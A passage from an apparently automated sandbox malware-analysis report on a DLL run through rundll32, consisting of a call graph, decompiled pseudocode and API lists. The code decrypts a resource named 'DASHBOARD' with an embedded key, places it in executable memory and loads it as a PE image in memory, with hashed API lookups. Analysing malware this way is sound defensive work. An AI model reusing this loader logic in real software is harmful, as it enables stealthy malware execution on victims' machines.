32056->31962 32056->31963 32058 1002fb18 32057->32058 32059 1002fb3f __VEC_memcpy 32058->32059 32060 100127eb 32058->32060 32059->32060 32061 1002f9a6 32060->32061 32062 1002fa53 32061->32062 32073 1002f9b4 32061->32073 32095 100368d5 TlsGetValue TlsGetValue GetModuleHandleA GetProcAddress __decode_pointer 32062->32095 32064 1002fa59 32096 100311f4 67 API calls __getptd_noexit 32064->32096 32067 1002fa5f 32067->31976 32070 1002fa17 RtlAllocateHeap 32070->32073 32071 1002f9c9 32071->32073 32088 10036892 67 API calls 2 library calls 32071->32088 32089 100366f2 67 API calls 7 library calls 32071->32089 32090 10030e7b GetModuleHandleA GetProcAddress ExitProcess ___crtCorExitProcess 32071->32090 32073->32070 32073->32071 32074 1002fa4a 32073->32074 32075 1002fa3e 32073->32075 32078 1002fa3c 32073->32078 32091 1002f957 67 API calls 4 library calls 32073->32091 32092 100368d5 TlsGetValue TlsGetValue GetModuleHandleA GetProcAddress __decode_pointer 32073->32092 32074->31976 32093 100311f4 67 API calls __getptd_noexit 32075->32093 32094 100311f4 67 API calls __getptd_noexit 32078->32094 32081 1002f9a6 _malloc 67 API calls 32080->32081 32082 10002990 32081->32082 32082->31978 32097 10002280 32083->32097 32086->31980 32087->31968 32088->32071 32089->32071 32091->32073 32092->32073 32093->32078 32094->32074 32095->32064 32096->32067 32134 10001990 32097->32134 32100 100022c3 SetLastError 32131 100022a9 32100->32131 32101 100022d5 32102 10001990 ___DllMainCRTStartup SetLastError 32101->32102 32103 100022ee 32102->32103 32104 10002310 SetLastError 32103->32104 32105 10002322 32103->32105 32103->32131 32104->32131 32106 10002331 SetLastError 32105->32106 32107 10002343 32105->32107 32106->32131 32108 1000234e SetLastError 32107->32108 32110 10002360 GetNativeSystemInfo 32107->32110 32108->32131 32111 10002414 SetLastError 32110->32111 32112 10002426 VirtualAlloc 32110->32112 32111->32131 32113 10002472 GetProcessHeap HeapAlloc 32112->32113 32114 10002447 VirtualAlloc 32112->32114 32116 100024ac 32113->32116 32117 1000248c VirtualFree SetLastError 32113->32117 32114->32113 32115 10002463 SetLastError 32114->32115 32115->32131 32118 10001990 ___DllMainCRTStartup SetLastError 32116->32118 32117->32131 32119 1000250e 32118->32119 32120 10002512 32119->32120 32121 1000251c VirtualAlloc 32119->32121 32172 10002840 VirtualFree VirtualFree GetProcessHeap HeapFree ___DllMainCRTStartup 32120->32172 32122 1000254b ___DllMainCRTStartup 32121->32122 32137 100019c0 32122->32137 32125 1000257f ___DllMainCRTStartup 32125->32120 32147 10001ff0 32125->32147 32129 100025e8 ___DllMainCRTStartup 32129->32120 32129->32131 32166 1be991 32129->32166 32131->31980 32132 1000264f SetLastError 32132->32120 32135 100019ab 32134->32135 32136 1000199f SetLastError 32134->32136 32135->32100 32135->32101 32135->32131 32136->32135 32138 100019f0 32137->32138 32139 10001a83 32138->32139 32141 10001a2c VirtualAlloc 32138->32141 32146 10001aa0 ___DllMainCRTStartup 32138->32146 32140 10001990 ___DllMainCRTStartup SetLastError 32139->32140 32142 10001a9c 32140->32142 32143 10001a50 32141->32143 32145 10001a57 ___DllMainCRTStartup 32141->32145 32144 10001aa4 VirtualAlloc 32142->32144 32142->32146 32143->32146 32144->32146 32145->32138 32146->32125 32148 10002029 IsBadReadPtr 32147->32148 32157 1000201f 32147->32157 32150 10002053 32148->32150 32148->32157 32151 10002085 SetLastError 32150->32151 32152 10002099 32150->32152 32150->32157 32151->32157 32173 100018b0 VirtualQuery VirtualFree VirtualAlloc ___DllMainCRTStartup 32152->32173 32154 100020b3 32155 100020bf SetLastError 32154->32155 32158 100020e9 32154->32158 32155->32157 32157->32120 32160 10001cb0 32157->32160 32158->32157 32159 100021f9 SetLastError 32158->32159 32159->32157 32164 10001cf8 ___DllMainCRTStartup 32160->32164 32161 10001e01 32162 10001b80 ___DllMainCRTStartup 2 API calls 32161->32162 32163 10001ddd 32162->32163 32163->32129 32164->32161 32164->32163 32174 10001b80 32164->32174 32167 1bea62 32166->32167 32168 1bea8d 32166->32168 32181 1bf8fd 32167->32181 32168->32131 32168->32132 32172->32131 32173->32154 32175 10001b9c 32174->32175 32180 10001b92 32174->32180 32176 10001c04 VirtualProtect 32175->32176 32178 10001baa 32175->32178 32176->32180 32179 10001be2 VirtualFree 32178->32179 32178->32180 32179->32180 32180->32164 32191 1bfde0 32181->32191 32182 1bffd1 32205 1bab87 32182->32205 32185 1bea75 32185->32168 32194 1b93ed 32185->32194 32190 1cdcf7 GetPEB 32190->32191 32191->32182 32191->32185 32191->32190 32192 1ba8b0 GetPEB 32191->32192 32197 1bb23c 32191->32197 32201 1c46bb 32191->32201 32215 1cda22 GetPEB 32191->32215 32216 1b47ce GetPEB 32191->32216 32217 1bf899 GetPEB 32191->32217 32218 1b4b61 32191->32218 32192->32191 32195 1caa30 GetPEB 32194->32195 32196 1b9456 ExitProcess 32195->32196 32196->32168 32198 1bb254 32197->32198 32222 1caa30 32198->32222 32202 1c46da 32201->32202 32203 1caa30 GetPEB 32202->32203 32204 1c4729 SHGetFolderPathW 32203->32204 32204->32191 32206 1babb0 32205->32206 32207 1b4b61 GetPEB 32206->32207 32208 1bad67 32207->32208 32230 1b7f5d 32208->32230 32210 1bad99 32214 1bada4 32210->32214 32234 1c1e67 GetPEB 32210->32234 32212 1badc4 32235 1c1e67 GetPEB 32212->32235 32214->32185 32215->32191 32216->32191 32217->32191 32219 1b4b74 32218->32219 32236 1b1ea7 32219->32236 32223 1cab1d 32222->32223 32224 1bb2b8 lstrcmpiW 32222->32224 32228 1c0a0e GetPEB 32223->32228 32224->32191 32226 1cab33 32229 1bcdcd GetPEB 32226->32229 32228->32226 32229->32224 32231 1b7f8e 32230->32231 32232 1caa30 GetPEB 32231->32232 32233 1b7fd4 CreateProcessW 32232->32233 32233->32210 32234->32212 32235->32214 32237 1b1ebc 32236->32237 32240 1b702c 32237->32240 32241 1b7049 32240->32241 32242 1caa30 GetPEB 32241->32242 32243 1b1f4c 32242->32243 32243->32191

                                                                                                                      Executed Functions

                                                                                                                      Function 100125C0 Relevance: 45.7, APIs: 7, Strings: 19, Instructions: 165memoryCOMMONLIBRARYCODE
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      C-Code - Quality: 89%
                                                                                                                      			E100125C0(void* __ebx, void* __edi, void* __esi, void* __eflags, struct HINSTANCE__* _a4, intOrPtr _a8, intOrPtr _a12) {
				void* _v8;
				void* _v12;
				intOrPtr _v16;
				signed int _v20;
				short _v22;
				short _v24;
				short _v26;
				short _v28;
				short _v30;
				short _v32;
				short _v34;
				short _v36;
				short _v38;
				char _v40;
				void* _v44;
				void* _v48;
				long _v52;
				void* _v56;
				struct HRSRC__* _v60;
				short _v64;
				short _v66;
				short _v68;
				short _v70;
				short _v72;
				short _v74;
				short _v76;
				short _v78;
				short _v80;
				short _v82;
				short _v84;
				short _v86;
				char _v88;
				intOrPtr _v92;
				void* __ebp;
				signed int _t66;
				void* _t70;
				void* _t72;
				struct HRSRC__* _t74;
				void* _t78;
				intOrPtr _t92;
				void* _t93;
				void* _t95;
				intOrPtr _t104;
				signed int _t120;
				void* _t121;

				_t119 = __esi;
				_t118 = __edi;
				_t96 = __ebx;
				_t66 =  *0x100545cc; // 0xb3edc9c6
				_v20 = _t66 ^ _t120;
				_v92 = _a8;
				 *0x10055a80 = _a4;
				_t109 = _a8;
				 *0x10055a84 = _a8;
				 *0x10055a88 = _a12;
				_v8 = 0;
				_v52 = 0;
				_v44 = 0;
				_v48 = 0;
				_v12 = 0;
				_t70 = E10006A90(__eflags); // executed
				_t131 = _t70;
				if(_t70 != 0) {
					_push(0x10046758);
					E1002FE65(__ebx, _t109, __edi, __esi, __eflags);
					_t72 = 0;
				} else {
					 *0x100530b8 = 0;
					 *0x100530bc = 0;
					 *0x100530c0 = 0;
					 *0x100530c8 = 0;
					 *0x100530c4 = 0;
					 *0x100530cc = 0;
					_v60 = 0;
					_v56 = 0;
					_t74 = FindResourceW(_a4, 0x1705, L"DASHBOARD"); // executed
					_v60 = _t74;
					_v56 = LoadResource(_a4, _v60);
					_v52 = SizeofResource(_a4, _v60);
					_v88 = 0x6b;
					_v86 = 0x65;
					_v84 = 0x72;
					_v82 = 0x6e;
					_v80 = 0x65;
					_v78 = 0x6c;
					_v76 = 0x33;
					_v74 = 0x32;
					_v72 = 0x2e;
					_v70 = 0x64;
					_v68 = 0x6c;
					_v66 = 0x6c;
					_v64 = 0;
					_v40 = 0x6e;
					_v38 = 0x74;
					_v36 = 0x64;
					_v34 = 0x6c;
					_v32 = 0x6c;
					_v30 = 0x2e;
					_v28 = 0x64;
					_v26 = 0x6c;
					_v24 = 0x6c;
					_v22 = 0;
					_t78 = E10006A90(_t131); // executed
					if(_t78 == 0) {
						_t45 =  &_v88; // 0x6b
						_t95 = E100048E0(_t45);
						_t121 = _t121 + 4;
						_v44 = _t95;
					}
					_t47 =  &_v40; // 0x6e
					_v48 = E100048E0(_t47);
					 *0x10055a7c = E100053D0(_v44, 0x6c705b40);
					 *0x10055a78 = E100053D0(_v44, 0x531ff383);
					_t133 =  *0x10055a78;
					if( *0x10055a78 == 0) {
						__eflags = 0x2000;
						_v12 = VirtualAlloc(0, _v52, 0x00002000 -  *0x100530cc | 0x00001000, 0x40);
					} else {
						_t93 =  *0x10055a78(0xffffffff, 0, _v52, 0x3000, 0x40, 0); // executed
						_v12 = _t93;
					}
					E1002FB00(_t96, _t118, _t119, _v12, _v56, _v52);
					_t104 =  *0x100530b4; // 0x2795
					_v16 = E1002F9A6(_t96, _v56, _t118, _t119, _t104);
					E10002970(_t133, _v16, "6p2Z6a6CZ&M>ZR$a@Y$xnQ?<XBeh<22mz&0", 0x24);
					_t109 = _v16;
					E10003EE0(_v16, _v12, _v52);
					_t92 = E100026A0(0x10055a64, _v12, _v52); // executed
					 *0x10055a8c = _t92;
					_t72 = 1;
				}
				return E1002F81E(_t72, _t96, _v20 ^ _t120, _t109, _t118, _t119);
			}
















































                                                                                                                      0x100125c0
                                                                                                                      0x100125c0
                                                                                                                      0x100125c0
                                                                                                                      0x100125c6
                                                                                                                      0x100125cd
                                                                                                                      0x100125d3
                                                                                                                      0x100125d9
                                                                                                                      0x100125df
                                                                                                                      0x100125e2
                                                                                                                      0x100125eb
                                                                                                                      0x100125f0
                                                                                                                      0x100125f7
                                                                                                                      0x100125fe
                                                                                                                      0x10012605
                                                                                                                      0x1001260c
                                                                                                                      0x10012613
                                                                                                                      0x10012618
                                                                                                                      0x1001261a
                                                                                                                      0x1001265a
                                                                                                                      0x1001265f
                                                                                                                      0x10012667
                                                                                                                      0x1001261c
                                                                                                                      0x1001261c
                                                                                                                      0x10012626
                                                                                                                      0x10012630
                                                                                                                      0x1001263a
                                                                                                                      0x10012644
                                                                                                                      0x1001264e
                                                                                                                      0x1001266e
                                                                                                                      0x10012675
                                                                                                                      0x1001268a
                                                                                                                      0x10012690
                                                                                                                      0x100126a1
                                                                                                                      0x100126b2
                                                                                                                      0x100126b5
                                                                                                                      0x100126bb
                                                                                                                      0x100126c1
                                                                                                                      0x100126c7
                                                                                                                      0x100126cd
                                                                                                                      0x100126d3
                                                                                                                      0x100126d9
                                                                                                                      0x100126df
                                                                                                                      0x100126e5
                                                                                                                      0x100126eb
                                                                                                                      0x100126f1
                                                                                                                      0x100126f7
                                                                                                                      0x100126fd
                                                                                                                      0x10012703
                                                                                                                      0x10012709
                                                                                                                      0x1001270f
                                                                                                                      0x10012715
                                                                                                                      0x1001271b
                                                                                                                      0x10012721
                                                                                                                      0x10012727
                                                                                                                      0x1001272d
                                                                                                                      0x10012733
                                                                                                                      0x10012739
                                                                                                                      0x1001273f
                                                                                                                      0x10012746
                                                                                                                      0x10012748
                                                                                                                      0x1001274c
                                                                                                                      0x10012751
                                                                                                                      0x10012754
                                                                                                                      0x10012754
                                                                                                                      0x10012757
                                                                                                                      0x10012763
                                                                                                                      0x10012777
                                                                                                                      0x1001278d
                                                                                                                      0x10012792
                                                                                                                      0x10012799
                                                                                                                      0x100127c4
                                                                                                                      0x100127d7
                                                                                                                      0x1001279b
                                                                                                                      0x100127ac
                                                                                                                      0x100127b2
                                                                                                                      0x100127b2
                                                                                                                      0x100127e6
                                                                                                                      0x100127ee
                                                                                                                      0x100127fd
                                                                                                                      0x1001280b
                                                                                                                      0x1001281b
                                                                                                                      0x1001281f
                                                                                                                      0x10012834
                                                                                                                      0x10012839
                                                                                                                      0x1001283e
                                                                                                                      0x1001283e
                                                                                                                      0x10012850

                                                                                                                      APIs
                                                                                                                        • Part of subcall function 10006A90: _malloc.LIBCMT ref: 10006A9C
                                                                                                                      • _printf.LIBCMT ref: 1001265F
                                                                                                                      • FindResourceW.KERNEL32(00000000,00001705,DASHBOARD), ref: 1001268A
                                                                                                                      • LoadResource.KERNEL32(00000000,00000000), ref: 1001269B
                                                                                                                      • SizeofResource.KERNEL32(00000000,00000000), ref: 100126AC
                                                                                                                      • VirtualAllocExNuma.KERNELBASE(000000FF,00000000,00000000,00003000,00000040,00000000), ref: 100127AC
                                                                                                                      • VirtualAlloc.KERNEL32(00000000,00000000,-100510CC,00000040), ref: 100127D1
                                                                                                                      • _malloc.LIBCMT ref: 100127F5
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.563850517.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000C.00000002.563838910.0000000010000000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 0000000C.00000002.563924803.0000000010046000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 0000000C.00000002.563954086.0000000010053000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 0000000C.00000002.563968854.0000000010057000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 0000000C.00000002.563980975.000000001005A000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Resource$AllocVirtual_malloc$FindLoadNumaSizeof_printf
                                                                                                                      • String ID: .$.$2$3$6p2Z6a6CZ&M>ZR$a@Y$xnQ?<XBeh<22mz&0$DASHBOARD$d$d$e$kre3.l$l$l$l$l$l$l$l$n$ndldl
                                                                                                                      • API String ID: 572389289-2839844625
                                                                                                                      • Opcode ID: adac8d752e0c47dc141f46a7132d7a35c557a18b7d00a43f57a8df52d4076e8d
                                                                                                                      • Instruction ID: 8f66a7c676ce8d0fa2ca8bd8519024a549b55f77dd79b918ae70bd0eec3b217e
                                                                                                                      • Opcode Fuzzy Hash: adac8d752e0c47dc141f46a7132d7a35c557a18b7d00a43f57a8df52d4076e8d
                                                                                                                      • Instruction Fuzzy Hash: FB613EB5D10218EBEB00DFA0DC95B9EBBB5FF08344F10911CE504AB390E7B66548CB6A
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10002280 Relevance: 22.8, APIs: 15, Instructions: 331COMMONLIBRARYCODE
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 36 10002280-100022a7 call 10001990 39 100022b0-100022c1 36->39 40 100022a9-100022ab 36->40 42 100022c3-100022d0 SetLastError 39->42 43 100022d5-100022f0 call 10001990 39->43 41 1000269a-1000269d 40->41 42->41 46 100022f2-100022f4 43->46 47 100022f9-1000230e 43->47 46->41 48 10002310-1000231d SetLastError 47->48 49 10002322-1000232f 47->49 48->41 50 10002331-1000233e SetLastError 49->50 51 10002343-1000234c 49->51 50->41 52 10002360-10002381 51->52 53 1000234e-1000235b SetLastError 51->53 54 10002395-1000239f 52->54 53->41 55 100023a1-100023a8 54->55 56 100023d7-10002412 GetNativeSystemInfo 54->56 57 100023b8-100023c4 55->57 58 100023aa-100023b6 55->58 59 10002414-10002421 SetLastError 56->59 60 10002426-10002445 VirtualAlloc 56->60 61 100023c7-100023cd 57->61 58->61 59->41 62 10002472-1000248a GetProcessHeap HeapAlloc 60->62 63 10002447-10002461 VirtualAlloc 60->63 64 100023d5 61->64 65 100023cf-100023d2 61->65 67 100024ac-10002510 call 10001990 62->67 68 1000248c-100024a7 VirtualFree SetLastError 62->68 63->62 66 10002463-1000246d SetLastError 63->66 64->54 65->64 66->41 72 10002512 67->72 73 1000251c-10002581 VirtualAlloc call 10001810 call 100019c0 67->73 68->41 74 1000268c-10002698 call 10002840 72->74 81 10002583 73->81 82 1000258d-1000259e 73->82 74->41 81->74 83 100025a0-100025b6 call 10001eb0 82->83 84 100025b8-100025bb 82->84 86 100025c2-100025d0 call 10001ff0 83->86 84->86 90 100025d2 86->90 91 100025dc-100025ea call 10001cb0 86->91 90->74 94 100025f6-10002604 call 10001e30 91->94 95 100025ec 91->95 98 10002606 94->98 99 1000260d-10002616 94->99 95->74 98->74 100 10002618-1000261f 99->100 101 1000267d-10002680 99->101 103 10002621-10002643 call 1be991 100->103 104 1000266a-10002678 100->104 102 10002687-1000268a 101->102 102->41 106 10002646-1000264d 103->106 105 1000267b 104->105 105->102 107 1000265e-10002668 106->107 108 1000264f-1000265a SetLastError 106->108 107->105 108->74
                                                                                                                      C-Code - Quality: 89%
                                                                                                                      			E10002280(intOrPtr __ecx, signed short* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				void* _v8;
				void* _v12;
				signed short* _v16;
				void* _v20;
				void* _v24;
				long _v28;
				signed int _v32;
				intOrPtr _v64;
				char _v68;
				void* _v72;
				intOrPtr _v76;
				intOrPtr* _v80;
				intOrPtr _v84;
				void* _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				void* _t180;
				void* _t191;
				void* _t198;
				void* _t202;
				intOrPtr _t209;
				void* _t220;
				intOrPtr _t269;
				intOrPtr _t278;
				intOrPtr _t326;

				_v100 = __ecx;
				_v72 = 0;
				_v20 = 0;
				if(E10001990(_v100, _a8, 0x40) != 0) {
					_v16 = _a4;
					if(( *_v16 & 0x0000ffff) == 0x5a4d) {
						_t10 =  &(_v16[0x1e]); // 0xfffefe57
						if(E10001990(_v100, _a8,  *_t10 + 0xf8) != 0) {
							_t15 =  &(_v16[0x1e]); // 0xfffefe57
							_v80 = _a4 +  *_t15;
							if( *_v80 == 0x4550) {
								if(( *(_v80 + 4) & 0x0000ffff) == 0x14c) {
									if(( *(_v80 + 0x38) & 0x00000001) == 0) {
										_v84 = _v80 + ( *(_v80 + 0x14) & 0x0000ffff) + 0x18;
										_v32 =  *(_v80 + 0x38);
										_v12 = 0;
										while(_v12 < ( *(_v80 + 6) & 0x0000ffff)) {
											if( *((intOrPtr*)(_v84 + 0x10)) != 0) {
												_v88 =  *((intOrPtr*)(_v84 + 0xc)) +  *((intOrPtr*)(_v84 + 0x10));
											} else {
												_v88 =  *((intOrPtr*)(_v84 + 0xc)) + _v32;
											}
											if(_v88 > _v20) {
												_v20 = _v88;
											}
											_v12 = _v12 + 1;
											_v84 = _v84 + 0x28;
										}
										__imp__GetNativeSystemInfo( &_v68); // executed
										_t59 = _v64 - 1; // 0x71
										_v28 =  *((intOrPtr*)(_v80 + 0x50)) + _t59 &  !(_v64 - 1);
										_t65 = _v64 - 1; // -1
										if(_v28 == (_v20 + _t65 &  !(_v64 - 1))) {
											_t180 = VirtualAlloc( *(_v80 + 0x34), _v28, 0x3000, 4); // executed
											_v24 = _t180;
											if(_v24 != 0) {
												L26:
												_v72 = HeapAlloc(GetProcessHeap(), 8, 0x34);
												if(_v72 != 0) {
													 *((intOrPtr*)(_v72 + 4)) = _v24;
													asm("sbb edx, edx");
													 *(_v72 + 0x14) =  ~( ~( *(_v80 + 0x16) & 0x2000));
													 *((intOrPtr*)(_v72 + 0x1c)) = _a12;
													 *((intOrPtr*)(_v72 + 0x20)) = _a16;
													 *((intOrPtr*)(_v72 + 0x24)) = _a20;
													 *((intOrPtr*)(_v72 + 0x28)) = _a24;
													 *((intOrPtr*)(_v72 + 0x30)) = _v64;
													if(E10001990(_v100, _a8,  *(_v80 + 0x54)) != 0) {
														_t191 = VirtualAlloc(_v24,  *(_v80 + 0x54), 0x1000, 4); // executed
														_v8 = _t191;
														E10001810(_v8, _v16,  *(_v80 + 0x54));
														_t115 =  &(_v16[0x1e]); // 0xfffefe57
														 *_v72 = _v8 +  *_t115;
														 *((intOrPtr*)( *_v72 + 0x34)) = _v24;
														_t198 = E100019C0(_v100, _a4, _a8, _v80, _v72); // executed
														if(_t198 != 0) {
															_t269 =  *((intOrPtr*)( *_v72 + 0x34)) -  *(_v80 + 0x34);
															_v76 = _t269;
															if(_t269 == 0) {
																 *((intOrPtr*)(_v72 + 0x18)) = 1;
															} else {
																 *((intOrPtr*)(_v72 + 0x18)) = E10001EB0(_v100, _v72, _v76);
															}
															if(E10001FF0(_v100, _v72) != 0) {
																_t202 = E10001CB0(_v100, _v72); // executed
																if(_t202 != 0) {
																	if(E10001E30(_v100, _v72) != 0) {
																		if( *((intOrPtr*)( *_v72 + 0x28)) == 0) {
																			 *(_v72 + 0x2c) = 0;
																			L49:
																			return _v72;
																		}
																		if( *(_v72 + 0x14) == 0) {
																			 *(_v72 + 0x2c) = _v24 +  *((intOrPtr*)( *_v72 + 0x28));
																			L47:
																			goto L49;
																		}
																		_v96 = _v24 +  *((intOrPtr*)( *_v72 + 0x28));
																		_t209 =  *0x10055a88; // 0x0
																		_t278 =  *0x10055a84; // 0x1
																		_t326 =  *0x10055a80; // 0x10000000
																		_v92 = _v96(_t326, _t278, _t209);
																		if(_v92 != 0) {
																			 *((intOrPtr*)(_v72 + 0x10)) = 1;
																			goto L47;
																		}
																		SetLastError(0x45a);
																		L50:
																		E10002840(_v100, _v72);
																		return 0;
																	}
																	goto L50;
																}
																goto L50;
															}
															goto L50;
														}
														goto L50;
													}
													goto L50;
												}
												VirtualFree(_v24, 0, 0x8000);
												SetLastError(0xe);
												return 0;
											}
											_t220 = VirtualAlloc(0, _v28, 0x3000, 4); // executed
											_v24 = _t220;
											if(_v24 != 0) {
												goto L26;
											}
											SetLastError(0xe);
											return 0;
										}
										SetLastError(0xc1);
										return 0;
									}
									SetLastError(0xc1);
									return 0;
								}
								SetLastError(0xc1);
								return 0;
							}
							SetLastError(0xc1);
							return 0;
						}
						return 0;
					}
					SetLastError(0xc1);
					return 0;
				}
				return 0;
			}





























                                                                                                                      0x10002286
                                                                                                                      0x10002289
                                                                                                                      0x10002290
                                                                                                                      0x100022a7
                                                                                                                      0x100022b3
                                                                                                                      0x100022c1
                                                                                                                      0x100022d8
                                                                                                                      0x100022f0
                                                                                                                      0x100022ff
                                                                                                                      0x10002302
                                                                                                                      0x1000230e
                                                                                                                      0x1000232f
                                                                                                                      0x1000234c
                                                                                                                      0x1000236e
                                                                                                                      0x10002377
                                                                                                                      0x1000237a
                                                                                                                      0x10002395
                                                                                                                      0x100023a8
                                                                                                                      0x100023c4
                                                                                                                      0x100023aa
                                                                                                                      0x100023b3
                                                                                                                      0x100023b3
                                                                                                                      0x100023cd
                                                                                                                      0x100023d2
                                                                                                                      0x100023d2
                                                                                                                      0x10002389
                                                                                                                      0x10002392
                                                                                                                      0x10002392
                                                                                                                      0x100023db
                                                                                                                      0x100023ea
                                                                                                                      0x100023f8
                                                                                                                      0x10002401
                                                                                                                      0x10002412
                                                                                                                      0x10002438
                                                                                                                      0x1000243e
                                                                                                                      0x10002445
                                                                                                                      0x10002472
                                                                                                                      0x10002483
                                                                                                                      0x1000248a
                                                                                                                      0x100024b2
                                                                                                                      0x100024c4
                                                                                                                      0x100024cb
                                                                                                                      0x100024d4
                                                                                                                      0x100024dd
                                                                                                                      0x100024e6
                                                                                                                      0x100024ef
                                                                                                                      0x100024f8
                                                                                                                      0x10002510
                                                                                                                      0x1000252e
                                                                                                                      0x10002534
                                                                                                                      0x10002546
                                                                                                                      0x10002554
                                                                                                                      0x1000255a
                                                                                                                      0x10002564
                                                                                                                      0x1000257a
                                                                                                                      0x10002581
                                                                                                                      0x10002598
                                                                                                                      0x1000259b
                                                                                                                      0x1000259e
                                                                                                                      0x100025bb
                                                                                                                      0x100025a0
                                                                                                                      0x100025b3
                                                                                                                      0x100025b3
                                                                                                                      0x100025d0
                                                                                                                      0x100025e3
                                                                                                                      0x100025ea
                                                                                                                      0x10002604
                                                                                                                      0x10002616
                                                                                                                      0x10002680
                                                                                                                      0x10002687
                                                                                                                      0x00000000
                                                                                                                      0x10002687
                                                                                                                      0x1000261f
                                                                                                                      0x10002678
                                                                                                                      0x1000267b
                                                                                                                      0x00000000
                                                                                                                      0x1000267b
                                                                                                                      0x1000262c
                                                                                                                      0x1000262f
                                                                                                                      0x10002635
                                                                                                                      0x1000263c
                                                                                                                      0x10002646
                                                                                                                      0x1000264d
                                                                                                                      0x10002661
                                                                                                                      0x00000000
                                                                                                                      0x10002661
                                                                                                                      0x10002654
                                                                                                                      0x1000268c
                                                                                                                      0x10002693
                                                                                                                      0x00000000
                                                                                                                      0x10002698
                                                                                                                      0x00000000
                                                                                                                      0x10002606
                                                                                                                      0x00000000
                                                                                                                      0x100025ec
                                                                                                                      0x00000000
                                                                                                                      0x100025d2
                                                                                                                      0x00000000
                                                                                                                      0x10002583
                                                                                                                      0x00000000
                                                                                                                      0x10002512
                                                                                                                      0x10002497
                                                                                                                      0x1000249f
                                                                                                                      0x00000000
                                                                                                                      0x100024a5
                                                                                                                      0x10002454
                                                                                                                      0x1000245a
                                                                                                                      0x10002461
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x10002465
                                                                                                                      0x00000000
                                                                                                                      0x1000246b
                                                                                                                      0x10002419
                                                                                                                      0x00000000
                                                                                                                      0x1000241f
                                                                                                                      0x10002353
                                                                                                                      0x00000000
                                                                                                                      0x10002359
                                                                                                                      0x10002336
                                                                                                                      0x00000000
                                                                                                                      0x1000233c
                                                                                                                      0x10002315
                                                                                                                      0x00000000
                                                                                                                      0x1000231b
                                                                                                                      0x00000000
                                                                                                                      0x100022f2
                                                                                                                      0x100022c8
                                                                                                                      0x00000000
                                                                                                                      0x100022ce
                                                                                                                      0x00000000

                                                                                                                      APIs
                                                                                                                        • Part of subcall function 10001990: SetLastError.KERNEL32(0000000D,?,?,100022A5,10012839,00000040), ref: 100019A1
                                                                                                                      • SetLastError.KERNEL32(000000C1,10012839,00000040), ref: 100022C8
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.563850517.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000C.00000002.563838910.0000000010000000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 0000000C.00000002.563924803.0000000010046000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 0000000C.00000002.563954086.0000000010053000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 0000000C.00000002.563968854.0000000010057000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 0000000C.00000002.563980975.000000001005A000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorLast
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1452528299-0
                                                                                                                      • Opcode ID: 0e09b11d72102b2f53da7248ccc42e4e27664b89a2cf1ce4a90d5e07d10becff
                                                                                                                      • Instruction ID: 346a8eef4056a92d897d0963d9e5b5a8ca828aef95f805bf3d5880fe5d8ad0e4
                                                                                                                      • Opcode Fuzzy Hash: 0e09b11d72102b2f53da7248ccc42e4e27664b89a2cf1ce4a90d5e07d10becff
                                                                                                                      • Instruction Fuzzy Hash: 18E14974A00209DFEB48CF94C990AAEB7F6FF88340F208559E905AB359DB75AD42CF50
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10006A90 Relevance: 18.4, APIs: 1, Instructions: 16933COMMONLIBRARYCODE
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 110 10006a90-10006aab call 1002f9a6 113 10006ab7-10012570 110->113 114 10006aad-10006ab2 110->114 116 10012584-1001258b 113->116 115 100125b4-100125b8 114->115 117 10012597-1001259b call 1002fa69 116->117 118 1001258d-10012595 116->118 121 100125a0-100125a9 117->121 118->116 122 100125ab-100125ad 121->122 123 100125af 121->123 122->115 123->115
                                                                                                                      APIs
                                                                                                                      • _malloc.LIBCMT ref: 10006A9C
                                                                                                                        • Part of subcall function 1002F9A6: __FF_MSGBANNER.LIBCMT ref: 1002F9C9
                                                                                                                        • Part of subcall function 1002F9A6: __NMSG_WRITE.LIBCMT ref: 1002F9D0
                                                                                                                        • Part of subcall function 1002F9A6: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2,00000001), ref: 1002FA1E
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.563850517.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true
